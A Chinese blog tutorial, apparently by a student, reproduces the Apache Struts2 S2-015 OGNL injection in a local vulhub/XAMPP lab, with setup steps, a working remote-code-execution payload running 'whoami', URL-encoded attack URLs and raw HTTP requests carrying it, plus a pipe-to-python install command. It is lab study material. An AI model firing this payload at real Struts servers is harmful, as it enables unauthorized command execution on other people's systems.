Struts-S2-015漏洞利用(含环境搭建、含POC)
struts-s2-015
此文仅供大家交流学习,严禁非法使用
一、参考网址:
http://struts.apache.org/docs/s2-015.html
http://www.inbreak.net/archives/507#comment-7463
https://github.com/phith0n/vulhub/tree/master/struts2/s2-015
二、 影响版本:
2.0.0 - 2.3.14.2
三、 漏洞介绍:
Struts 2允许基于通配符定义动作映射,如下例所示:
<action name="*" class="example.ExampleSupport">
<result>/example/{1}.jsp</result>
</action>
如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。这个漏洞是两个问题的组合:
1.请求的操作名称未被转义或再次检查白名单
2.在TextParseUtil.translateVariables使用组合$和%开放字符时对OGNL表达式进行双重评估。
四、 环境搭建:
(windows)
环境搭建,类似与一下安装showcase,相同方法可以部署blank
- 下载/struts/2.1.6
下载地址:http://archive.apache.org/dist/struts/binaries/struts-2.1.6-apps.zip
-
下载安装xampp
-
部署showcase
-
解压
2.1.6_2.png
- 复制到.
- 重启tomcat
- 已成功自动部署
-
找到example.xml
打开
1.png
发现已经存在通配符*
2.png
找到helloworld.java 打开
3.png
发现也不用改
4.png - 运行struts2-blank应用程序
Windows环境基本搭建完毕,以下只演示windows环境下渗透测试
环境搭建:(ubuntu)
curl -s https://bootstrap.pypa.io/get-pip.py | python3
-
安装docker
apt-get update && apt-get install docker.io -
启动docker服务
service docker start -
安装compose
pip install docker-compose
注意要先ssh连接,将公钥添加到github上,具体参照网上教程
-
拉取项目
git clone git@github.com:phith0n/vulhub.git
cd vulhub -
进入某一个漏洞/环境的目录
cd nginx_php5_mysql -
自动化编译环境
docker-compose build -
启动整个环境
docker-compose up -d
POC(此POC是在官方删除了setAllowStaticMethodAccess后的解决方法)
${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('whoami').getInputStream()),#q}
六、 测试网址:
原始网址为:
http://127.0.0.1:8080/struts2-blank-2.1.6/example/HelloWorld.action
修改后为:
http://127.0.0.1:8080/struts2-blank-2.1.6/example/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%2C%23q%7D.action
七、执行结果
出现了404
可能在怀疑poc有问题?还是在怀疑poc没有放到正确位置
仔细观察404,发现已经成功了
5.png
同样ipconfig也能显示完整信息
八、二次引用执行漏洞
按照上面路径再次打开example.xml
6.png
修改后为
7.png
这里配置了 <param name="errorMessage">${message}</param>,其中 message 为 ParamAction 中的一个私有变量,这样配置会导致触发该 Result 时,Struts2 会从请求参数中获取 message 的值,并在解析过程中,触发了 OGNL 表达式执行,因此只用提交 %{1111*2} 作为其变量值提交就会得到执行。这里需要注意的是这里的二次解析是因为在 struts.xml 中使用 ${param} 引用了 Action 中的变量所导致的,并不针对于 type="httpheader" 这种返回方式。
原始数据包为
GET /struts2-blank-2.1.6/example/HelloWorld.action HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4305142080E1838AA532E10080BE9EF1
Connection: close
修改后为
GET /struts2-blank-2.1.6/example/HelloWorld.action?message=%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%2C%23q%7D HTTP/1.1
Host: 127.0.0.1:8080
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=4305142080E1838AA532E10080BE9EF1
Connection: close
执行结果
8.png
八、 至此,该漏洞基本利用完毕
本人还是一个未毕业的小萌新,希望大家多多帮助,有问题请发送邮件到xrzsupupup@163.com不胜感激,我也会尽量去帮助大家
坚决做一名白帽子